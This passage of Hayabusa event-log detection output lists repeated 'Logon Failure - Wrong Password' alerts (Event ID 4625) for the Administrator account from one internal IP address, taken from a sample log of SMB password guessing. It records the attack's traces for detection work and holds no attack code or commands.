NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.745 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mjL5hvyYesMfDISw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.774 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3bh8c5ohv55SAX26 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.817 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MflfcFDnGU3xUOmz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.859 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aX0wfTs5FzCdwGrR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.895 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9gdU6faDjEH5wW2X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.929 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 507PC8xD6l0TbhG3 | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:25.973 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrWgYcf9EuXt4MHS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:26.088 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GvIGEw3fdX9cDzIV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:26.159 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9X1q0dT5irWa44Rz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:26.307 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZpgAkElSQjVo53z2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:26.410 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nxUEwRMaiAhiIXv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:26.453 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
vIoaysmFNfEerv8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:26.528 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aHLhFgL0xfnrAIoF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:26.619 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YGK96B1hDPMK9YKh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:26.704 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yhDnNRDnAwctVtgQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:26.793 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zzO7RKaBPpg549A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:26.859 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zDgDGO3IKiLoIQ5D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.024 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: 0aaYeBTUEudC3446 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.093 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I41H8U06uuGlMf9S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.170 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r6Eh55149gbuU2el | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.248 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ajzJabQi7CjosFQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.290 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l9y7gyU9aJi6Fpm3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.361 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hbLiIVcBYlu5JkX2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.424 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: bDfEfHk54J3lJI6m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.496 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WOpuMTECalyeObl7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.537 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nZQYU1dyQOqlNJDL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.577 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pc58gDT07WNH3mMz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.624 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhExnDfInKbEI6AO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.710 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKKTTQ0ZT2Ye4TV9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.772 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: LdBFYyftnH67Gyh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.812 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eO6c2PDl7zVBGzPi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.848 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1ONnDOs16EnBkdFv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.897 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aTHHCX9EoKRY4zhR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.939 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f1jhH08oLzpONDpa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:27.976 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o2YK7zc7Ne9c8txA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.013 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 86CrOo9CFreIzSM5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.056 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0X9UEojEnc350xPc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.096 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9g3PO3jofnySl92G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.176 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TRndfQmPYuhV0Ri | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.204 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yyJOdaks4B1sKMDv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.252 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IB3OSmcFx5TUiiJX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:50:28.309 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lo3Ex40dkIeO53HF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.352 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkzDG8QOM2cxbokF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.395 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YoMf36ZXJBLnYxtc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.436 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5izPIefHqDDWNDlu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.476 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z9o4f1XvvcVXBNwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.521 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IjCR48ZJFyEhzrYI | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.556 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mUV9i4O2gapcC01d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.608 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJzGAMQCvJBFOUPq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.645 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fyyu0x6I29R2J10Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.687 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8lCe1shqSs0xNwAJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.728 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ipZAMvm56d5mE9Fc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.774 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XX9N7jodTuEYBCSE | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.814 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h5DBFGpzfJJ7gYV1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.848 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fQ3qTwcWkXJDuXDI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.889 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TOfkvLSo2HuhMtvk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.940 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y9DQUhPQHvvwAO0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:28.990 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yao1JM0tSFv5IHnL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.037 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
NXGm63wiZz3ZYFb9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.077 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: izvPgZCO2GRVLhId | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.119 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iI9zO2o7jd922pfK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.164 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UnAGy86My6hVwt4J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.208 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HhFTzONSVEziRtgq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.251 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdEv4ooC8AApqU1T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.292 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: TxFGRBKVK732Aeu4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.336 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITg8QH90LKkAQMLL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.377 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E8YKCN2uxmJtYxdW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.411 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lcVIqrTQbNLFW7Cr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.449 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: taZx68l1ci0i2XB0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.487 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Jjy0gZhZCc9dVGd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.525 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: S1DxOWcNytmxHfxl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.555 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JGRFWos3MJeQ0oAr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.593 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I3YXVTiQAGbf57TH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.629 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eWNsBwoGd36krY2U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.668 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HIobpWCoOHdD76lL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.704 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W91ruUEdXwRcMxVB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:29.743 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
